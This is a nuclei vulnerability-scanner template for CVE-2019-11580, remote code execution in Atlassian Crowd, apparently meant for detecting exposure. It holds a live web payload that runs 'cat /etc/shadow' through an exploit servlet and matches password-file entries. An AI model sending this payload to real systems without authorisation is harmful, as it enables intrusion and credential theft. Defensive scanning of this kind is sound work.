nuclei-templates/cves/CVE-2019-11580.yaml

38 lines
1.4 KiB
YAML

id: cve-2019-11580
info:
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
author: dwisiswant0
severity: critical
# Atlassian Crowd and Crowd Data Center
# had the pdkinstall development plugin incorrectly enabled in release builds.
# Attackers who can send unauthenticated or authenticated requests
# to a Crowd or Crowd Data Center instance can exploit this vulnerability
# to install arbitrary plugins, which permits remote code execution on
# systems running a vulnerable version of Crowd or Crowd Data Center.
# All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
# from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
# from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
# from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
# and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
# -
# References:
# > https://github.com/jas502n/CVE-2019-11580
requests:
- method: GET
path:
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
- "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
matchers-condition: and
matchers:
- type: word
words:
- "root:*:"
- "bin:*:"
condition: and
part: body
- type: status
status:
- 200